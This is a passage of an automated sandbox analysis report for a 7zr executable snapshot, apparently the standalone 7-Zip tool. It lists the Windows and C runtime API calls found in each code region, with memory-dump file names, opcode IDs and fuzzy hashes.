                        • __EH_prolog.LIBCMT ref: 003CBF91
                          • Part of subcall function 003CD144: __EH_prolog.LIBCMT ref: 003CD149
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$free
                        • String ID:
                        • API String ID: 2654054672-0
                        • Opcode ID: 9f19e17210a88e8148782ff526c902022d099ff6ae7f7062945ed714fe648fbf
                        • Instruction ID: 4f22295769166842f122e79c5b13951ea9ea9b660a0ba1d79d95ba85cdc6c1a6
                        • Opcode Fuzzy Hash: 9f19e17210a88e8148782ff526c902022d099ff6ae7f7062945ed714fe648fbf
                        • Instruction Fuzzy Hash: D6117070510B14DFCB25EF64D905BCABBF4BF04344F008A6DE4AA975A2DBB4BA04DB84
                        APIs
                        • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,00381AD1,00000000,00000002,00000002,?,00387B3E,?,00000000), ref: 00387AFD
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: FileTime
                        • String ID:
                        • API String ID: 1425588814-0
                        • Opcode ID: e567c290a91d3a36bb02767a3a3f78168fbfbda0d2e3a4b69f6296abd1c502a4
                        • Instruction ID: 1da9939eb1457f3e2acb212609929febd85a3d65c0aa51d3f9812a5e0dc8736f
                        • Opcode Fuzzy Hash: e567c290a91d3a36bb02767a3a3f78168fbfbda0d2e3a4b69f6296abd1c502a4
                        • Instruction Fuzzy Hash: F9018F30108348BFDF27AF54CC05BEE3FA69B05320F248189B9A5562E1C760DE61D750
                        APIs
                        • __EH_prolog.LIBCMT ref: 003BC0B8
                          • Part of subcall function 003A7193: __EH_prolog.LIBCMT ref: 003A7198
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$free
                        • String ID:
                        • API String ID: 2654054672-0
                        • Opcode ID: 9abee6cd3670a45c4f665999fc997b9cdecf33817aecf92302034a146ee09ffe
                        • Instruction ID: 3f980b6eeec4a77057678aa2a6d50d451d70ab25266556b1bdbf38df947e1ca4
                        • Opcode Fuzzy Hash: 9abee6cd3670a45c4f665999fc997b9cdecf33817aecf92302034a146ee09ffe
                        • Instruction Fuzzy Hash: A8F02432A04712DBD723AB49E8817EEF3ACEF14324F11002FE5029BA02CBB5EC018684
                        APIs
                        • __EH_prolog.LIBCMT ref: 003C0364
                          • Part of subcall function 003C01C4: __EH_prolog.LIBCMT ref: 003C01C9
                          • Part of subcall function 003C0143: __EH_prolog.LIBCMT ref: 003C0148
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                          • Part of subcall function 003C03D8: __EH_prolog.LIBCMT ref: 003C03DD
                          • Part of subcall function 003C004A: __EH_prolog.LIBCMT ref: 003C004F
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$free
                        • String ID:
                        • API String ID: 2654054672-0
                        • Opcode ID: 44d4e7f3acfdc8f1ca479163c1ea9f76f99b0dda9bbff28d23e4fc5b063e7008
                        • Instruction ID: ae4267d43d7cf6c514d63519efcdcff71d796082167458f7706a571e96bac897
                        • Opcode Fuzzy Hash: 44d4e7f3acfdc8f1ca479163c1ea9f76f99b0dda9bbff28d23e4fc5b063e7008
                        • Instruction Fuzzy Hash: C1F0F430918B90DBCB1FFBA8D42279DBBE4AF04314F10469DE452A72D2CBB86F048748
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 20515f79cfe69aa4de31592753b0796034f4dc88fb7985420e04657358a3109d
                        • Instruction ID: 497bf85f9fb1e6e7f735bc85033380fc30636c91c90f4affa63d5e94ff4be2f2
                        • Opcode Fuzzy Hash: 20515f79cfe69aa4de31592753b0796034f4dc88fb7985420e04657358a3109d
                        • Instruction Fuzzy Hash: F0F0C232E0011AEBCB11EF98D8409EFBB78FF44754B10805BF515E7650CB348A05CB94
                        APIs
                        • __EH_prolog.LIBCMT ref: 003C550A
                          • Part of subcall function 003C4E8A: __EH_prolog.LIBCMT ref: 003C4E8F
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: fbef85981d910581aa4ddcea8053da50fd34adbb7f5398f2bceda610ec66f8fa
                        • Instruction ID: d57032ddde366f891f8d46e43d91a71e130efac2999f8172917d92b3c9e38c23
                        • Opcode Fuzzy Hash: fbef85981d910581aa4ddcea8053da50fd34adbb7f5398f2bceda610ec66f8fa
                        • Instruction Fuzzy Hash: 41F06D76604914EBCB029F48E811FDE7BBAFF85364F11842EF80697241DB75ED018BA0
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: d3a4150437ddaaacbfd94c9e7285997a101d6a39cb0019ff688a3fa1c9ff6799
                        • Instruction ID: 40bbba650914e2461c028b1dc662d82ba2a2f75fc53edf1473befbbf83e4e9ff
                        • Opcode Fuzzy Hash: d3a4150437ddaaacbfd94c9e7285997a101d6a39cb0019ff688a3fa1c9ff6799
                        • Instruction Fuzzy Hash: 96E06D71604208AFC704EF98E855F9EB7A8EF49354F10841EB00A97205C734A900CA64
                        APIs
                        • __EH_prolog.LIBCMT ref: 003C5E30
                          • Part of subcall function 003C08B6: __aulldiv.LIBCMT ref: 003C093F
                          • Part of subcall function 0039DFC9: __EH_prolog.LIBCMT ref: 0039DFCE
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$__aulldiv
                        • String ID:
                        • API String ID: 604474441-0
                        • Opcode ID: 90de2d87f3b9d239cb97b0532c4112b054f3865c055703f7699ec823ca9d063e
                        • Instruction ID: 23c3adf973ecb922cd42a018af41f60a419763d102d958887076cdfbbb3a0b6c
                        • Opcode Fuzzy Hash: 90de2d87f3b9d239cb97b0532c4112b054f3865c055703f7699ec823ca9d063e
                        • Instruction Fuzzy Hash: 71E03970A01760DFCB56EFB8A54168EB6E4BB08700F00886FA046D7B41DBB4A9008B80
                        APIs
                        • __EH_prolog.LIBCMT ref: 003C8ED6
                          • Part of subcall function 003C9267: __EH_prolog.LIBCMT ref: 003C926C
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 0f144d27fd19e6d0f640dc1b50e0a1c530746996b7798d0fb58f2b5d92fcc8fb
                        • Instruction ID: e95e89ef132a68936d215d67c519fdd0d094c8a159714c36c0d2810605043247
                        • Opcode Fuzzy Hash: 0f144d27fd19e6d0f640dc1b50e0a1c530746996b7798d0fb58f2b5d92fcc8fb
                        • Instruction Fuzzy Hash: 61E0D871A14934DAC71EEB64E522BDDB7A8EF04708F000A5EA04393582CFB87B04C785
                        APIs
                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00387C8B
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: FileWrite
                        • String ID:
                        • API String ID: 3934441357-0
                        • Opcode ID: 93deed89a5229f80e47490fab75869c913d4d60110b19056e3e2e9cb61356480
                        • Instruction ID: 5e8c80b9834cc12ad1bdf69b6ac20dcddf7b8b5ad47f99d701394ed3f9bd2264
                        • Opcode Fuzzy Hash: 93deed89a5229f80e47490fab75869c913d4d60110b19056e3e2e9cb61356480
                        • Instruction Fuzzy Hash: 97E01A75600209FBCF11CFA5D801BCE7BB9EB09754F20C06AF9199A260D739DA50DF54
                        APIs
                        • __EH_prolog.LIBCMT ref: 003CBE6E
                          • Part of subcall function 003C5E2B: __EH_prolog.LIBCMT ref: 003C5E30
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 7201dc7563cb4239fa53bdd5f79b094b657e6d30ae68d1b551b8c6d601912286
                        • Instruction ID: 34aeb2853e292247ea48a204d3300e9529c9d7d0f845fa8ada68e771c9cebb80
                        • Opcode Fuzzy Hash: 7201dc7563cb4239fa53bdd5f79b094b657e6d30ae68d1b551b8c6d601912286
                        • Instruction Fuzzy Hash: 2FE09271A24A608BD316FB24D411BDDB7A8BF10304F00C45FE0A6D3282CFB87A08C7A5
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID:
                        • API String ID: 1795875747-0
                        • Opcode ID: 4319323eaf2377ee8556df0ee0510bd86f44c401b7e35c35c53364268024dcf4
                        • Instruction ID: 35c7e1a22d81000b5cffa5ae2bb891a3143049734f5fe0a52e2703c776535caf
                        • Opcode Fuzzy Hash: 4319323eaf2377ee8556df0ee0510bd86f44c401b7e35c35c53364268024dcf4
                        • Instruction Fuzzy Hash: 36D01232504119ABCF156B94DC46CDD77BCEF0C214700442AF541E2150EA75E515CB94
                        APIs
                        • __EH_prolog.LIBCMT ref: 003BF74A
                          • Part of subcall function 003BF784: __EH_prolog.LIBCMT ref: 003BF789
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID:
                        • API String ID: 3519838083-0
                        • Opcode ID: 6419d0e981972bba3b95c592a5561a53072b7ac3f365245459ee4396405f9661
                        • Instruction ID: e0ef0aa5cdbcc73a24d823bbec833f59d352dab97986a46184121cb865d55968
                        • Opcode Fuzzy Hash: 6419d0e981972bba3b95c592a5561a53072b7ac3f365245459ee4396405f9661
                        • Instruction Fuzzy Hash: CAD01272A15214BFD7149B45EC13BEEB778EB40758F10456FF001A5141C7B9590086A4
                        APIs
                        • ReadFile.KERNELBASE(00000002,?,?,00000000,00000000,00000002,?,0038785F,00000000,00004000,00000000,00000002,?,?,?), ref: 00387B65
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: FileRead
                        • String ID:
                        • API String ID: 2738559852-0
                        • Opcode ID: 18b1791b1059e628a53120def4ea3ef4d6e9908f56c72a579a7ee67402c03812
                        • Instruction ID: 3fba28207082e6b782d1a3e1d4014519d9dd370a560eb4488853187293dd34fd
                        • Opcode Fuzzy Hash: 18b1791b1059e628a53120def4ea3ef4d6e9908f56c72a579a7ee67402c03812
                        • Instruction Fuzzy Hash: 2FE0EC75200208FBDF11CF90CC41F8E7BB9AF49754F208058E90596160C375AA64EF54
                        APIs
                        • __EH_prolog.LIBCMT ref: 003D80AF
                          • Part of subcall function 00381E0C: malloc.MSVCRT ref: 00381E1F
                          • Part of subcall function 00381E0C: _CxxThrowException.MSVCRT(?,00434B28), ref: 00381E39
                          • Part of subcall function 003CBDB5: __EH_prolog.LIBCMT ref: 003CBDBA
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog$ExceptionThrowmalloc
                        • String ID:
                        • API String ID: 3744649731-0
                        • Opcode ID: 8e91d9132c1c7659e4762b6a059ed210e2e9f603e2b0c1f61c48c1801733f578
                        • Instruction ID: cbc3955c6bdd2dbe7ff9515c5a3266aef7b3aea3c959395a2f67cbde2fa4a539
                        • Opcode Fuzzy Hash: 8e91d9132c1c7659e4762b6a059ed210e2e9f603e2b0c1f61c48c1801733f578
                        • Instruction Fuzzy Hash: 9ED05E71B09201AFCB09FFB4A8267AEB2A4AB44704F00457EA016E7B81EF74AD018714
                        APIs
                        • FindClose.KERNELBASE(00000000,?,00386880), ref: 00386853
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CloseFind
                        • String ID:
                        • API String ID: 1863332320-0
                        • Opcode ID: 1e4db0939324da04a16202b3bddde001a1c6c1c92a595a3b404dac0ed865c9b3
                        • Instruction ID: 19c2509beddac384818335c4d395e14041b3c5cf289a5cff6a1d6c9dc8761e83
                        • Opcode Fuzzy Hash: 1e4db0939324da04a16202b3bddde001a1c6c1c92a595a3b404dac0ed865c9b3
                        • Instruction Fuzzy Hash: D7D01231104321468A746F7D784A9D533D86E063343220799F0B4C31E1D7608C835B90
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs
                        • String ID:
                        • API String ID: 1795875747-0
                        • Opcode ID: c7d9f7908ddc1716f4c098abc4090a2d0560f42b55692f5a230d447bf65dd2e7
                        • Instruction ID: 56b77405e7ca0eb7b3028a50874de7b7e53a09f7cfb5c77c4955fb8bafae62bb
                        • Opcode Fuzzy Hash: c7d9f7908ddc1716f4c098abc4090a2d0560f42b55692f5a230d447bf65dd2e7
                        • Instruction Fuzzy Hash: 52D0C936108351AF96266F05EC0AC8BBBA5FFD9320721082FF480921609B626825DAA4
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputc
                        • String ID:
                        • API String ID: 1992160199-0
                        • Opcode ID: 525f3f1abf51ed9a59f0184580f4a194cac5041e6044434ed0c1c4d1b3f2c24e
                        • Instruction ID: 19dbb7dae6da255af3c9873a0e20239a274e5a4bbf9cfe6e1620797b4d782611
                        • Opcode Fuzzy Hash: 525f3f1abf51ed9a59f0184580f4a194cac5041e6044434ed0c1c4d1b3f2c24e
                        • Instruction Fuzzy Hash: DAB092323082209BE6281A9CBC0AAD46794DF09732B21006BF544C21909E911C928A99
                        APIs
                        • SetFileTime.KERNELBASE(?,?,?,?,00387C65,00000000,00000000,?,0038F238,?,?,?,?), ref: 00387C49
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: FileTime
                        • String ID:
                        • API String ID: 1425588814-0
                        • Opcode ID: 0b02cd97e66d10077b84625b5f4c2410f7fef5d065cef46b727bdd90a2cfffe0
                        • Instruction ID: 480a68ebc3f6f30759f7d9f75a7b8328d8923dd50bc91f9cc653b03896711896
                        • Opcode Fuzzy Hash: 0b02cd97e66d10077b84625b5f4c2410f7fef5d065cef46b727bdd90a2cfffe0
                        • Instruction Fuzzy Hash: 32C04C36258115FF8F120F70CC45C1EBBA2ABA5711F10C918F159C4070C7328034EF02
                        APIs
                        • SetEndOfFile.KERNELBASE(?,00387D81,?,?,?), ref: 00387D3E
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: File
                        • String ID:
                        • API String ID: 749574446-0
                        • Opcode ID: 8711018a696474f337af69897df8dd432afe4073ddf8e6f893f801902dc1c1e6
                        • Instruction ID: 3f4c3e662008f7d3e9fc56a83c821833749f8250a5a28049c409cc3ebeae193e
                        • Opcode Fuzzy Hash: 8711018a696474f337af69897df8dd432afe4073ddf8e6f893f801902dc1c1e6
                        • Instruction Fuzzy Hash: 4AA001702E511A8A8E211B34D84A8283AA1AA526067A026A4A002CA4B5DB22442AAA45
                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: memmove
                        • String ID:
                        • API String ID: 2162964266-0
                        • Opcode ID: f40501bdbba6b361c29d0d577733d48cdbc0352d8a0ee3e65f1ff89bbd0c2e1a
                        • Instruction ID: 91e4d8eb23aa132c4538aef04d5c3e3018a91ecdb98bae2050f1092840b1788d
                        • Opcode Fuzzy Hash: f40501bdbba6b361c29d0d577733d48cdbc0352d8a0ee3e65f1ff89bbd0c2e1a
                        • Instruction Fuzzy Hash: 2C817071D203499FCF16DFA8C480AEEBBB1EF48300F19A4A9E511B7241D770AA80CF60
                        APIs
                        • CloseHandle.KERNELBASE(00000000,00000000,00393D8D,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00393E12
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmp
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        Similarity
                        • API ID: malloc
                        • String ID:
                        • API String ID: 2803490479-0
                        APIs
                        • CloseHandle.KERNELBASE(00000000,?,003875AF,00000002,?,00000000,00000000), ref: 00387657
                        Similarity
                        • API ID: CloseHandle
                        • String ID:
                        • API String ID: 2962429428-0
                        APIs
                        • VirtualAlloc.KERNELBASE(00000000), ref: 00406B31
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        Similarity
                        • API ID: malloc
                        • String ID:
                        • API String ID: 2803490479-0
                        Similarity
                        • API ID: malloc
                        • String ID:
                        • API String ID: 2803490479-0
                        APIs
